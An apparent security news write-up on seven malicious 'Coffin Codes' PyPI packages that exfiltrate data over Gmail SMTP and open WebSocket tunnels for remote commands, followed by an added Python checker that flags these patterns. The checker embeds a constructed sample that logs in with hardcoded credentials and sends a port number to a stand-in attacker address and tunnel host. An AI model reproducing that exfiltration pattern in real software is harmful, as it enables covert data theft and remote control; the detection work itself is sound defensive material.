A recent investigation by Socket’s Threat Research Team has uncovered a sophisticated campaign using malicious Python packages to establish covert tunnels via Gmail’s SMTP protocol, enabling attackers to exfiltrate data and execute remote commands undetected.
The campaign, which operated through seven packages under the “Coffin Codes” theme, demonstrates a significant escalation in the abuse of trusted cloud services for command and control (C2) operations.
How the Attack Works
The malicious packages Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb were distributed via the Python Package Index (PyPI).
Once installed, these packages establish an encrypted connection to Gmail’s SMTP server using hardcoded credentials.
The malware then sends signals and critical information, such as tunnel port numbers, to attacker-controlled email addresses, effectively bypassing traditional network security measures that typically trust SMTP traffic.
The most advanced variants also establish outbound WebSocket connections, allowing the attacker to issue commands, transfer files, and potentially pivot deeper into the victim’s network.
The process is largely automated, requiring no user interaction, and is difficult to detect due to the use of legitimate protocols and services.
Evolution and Impact
While the earliest version, cfc-bsb, lacked direct exfiltration capabilities, it still posed risks through dynamic tunnel establishment and unverified message handling.
Later versions added explicit email-based exfiltration and hardcoded credentials, increasing their malicious potential.
The attacker’s infrastructure and credentials have remained consistent over several years, indicating a persistent and evolving threat.
The packages have since been removed from PyPI, but the incident highlights the ongoing risks posed by supply chain attacks and the exploitation of trusted cloud services.
Risk Factor Table
Package Name | Year Released | Exfiltration via Email | WebSocket Tunnel | Hardcoded Credentials | Relative Risk Level |
---|---|---|---|---|---|
Coffin-Codes-Pro | 2022 | Yes | Yes | Yes | High |
Coffin-Codes-NET2 | 2022/2025 | Yes | Yes | Yes | High |
Coffin-Codes-NET | 2022 | Yes | Yes | Yes | High |
Coffin-Codes-2022 | 2021 | Yes | Yes | Yes | High |
Coffin2022 | 2021 | Yes | Yes | Yes | High |
Coffin-Grave | 2021 | Yes | Yes | Yes | High |
cfc-bsb | 2021 | No | Yes | No | Moderate |
Recommendations
- Monitor for unusual outbound SMTP traffic, especially to Gmail.
- Verify package authenticity by checking the publisher history and repository links.
- Regularly audit dependencies and use tools like Socket to scan for malicious packages.
- Restrict access to sensitive credentials and use isolated environments for testing third-party code.
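As an added example (not Socket's tooling and not the packages' source), a small static check that supports the dependency-audit recommendation: it parses a Python file and flags the pattern the article describes, a hardcoded Gmail SMTP login combined with a WebSocket-style import. The sample source, module lists and risk thresholds are constructed assumptions, and the thresholds loosely mirror the table above (credentials plus Gmail SMTP is High; a bare tunnel library is Moderate).

```python
import ast
from dataclasses import dataclass, field

# Constructed sample mimicking the described behaviour (not real package code):
# literal Gmail SMTP host, literal login credentials, outbound WebSocket.
SAMPLE_SOURCE = '''
import smtplib, websocket
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.login("someone@gmail.com", "app-password-placeholder")
srv.sendmail("someone@gmail.com", "attacker@example.com", "port=4444")
ws = websocket.create_connection("wss://example.invalid/tunnel")
'''

# Assumed module names that indicate an outbound tunnel/WebSocket capability.
SOCKET_MODULES = {"websocket", "websockets", "socketio"}


@dataclass
class Findings:
    imports: set = field(default_factory=set)
    smtp_hosts: list = field(default_factory=list)       # literal SMTP hosts
    hardcoded_logins: list = field(default_factory=list) # literal usernames


def audit_source(src: str) -> Findings:
    """Walk the AST and collect SMTP hosts, literal logins and imports."""
    f = Findings()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            f.imports.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            f.imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            consts = [a.value for a in node.args if isinstance(a, ast.Constant)]
            # smtplib.SMTP / SMTP_SSL called with a string-literal host
            if node.func.attr in ("SMTP", "SMTP_SSL") and consts and isinstance(consts[0], str):
                f.smtp_hosts.append(consts[0])
            # .login("user", "pass") where both credentials are string literals
            if node.func.attr == "login" and len(consts) >= 2 and all(isinstance(c, str) for c in consts[:2]):
                f.hardcoded_logins.append(consts[0])
    return f


def risk_level(f: Findings) -> str:
    """Constructed scoring: Gmail SMTP + literal credentials is the strongest signal."""
    gmail = any("gmail.com" in h for h in f.smtp_hosts)
    tunnel = bool(f.imports & SOCKET_MODULES)
    if gmail and f.hardcoded_logins:
        return "High"
    if tunnel or f.hardcoded_logins or f.smtp_hosts:
        return "Moderate"
    return "Low"
```

Run it over each `.py` file in a vendored dependency tree and review anything that is not "Low"; a literal `.login()` in library code is rarely legitimate regardless of host.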
This incident underscores the need for vigilance in open-source software supply chains and the growing sophistication of attackers leveraging trusted protocols for malicious ends.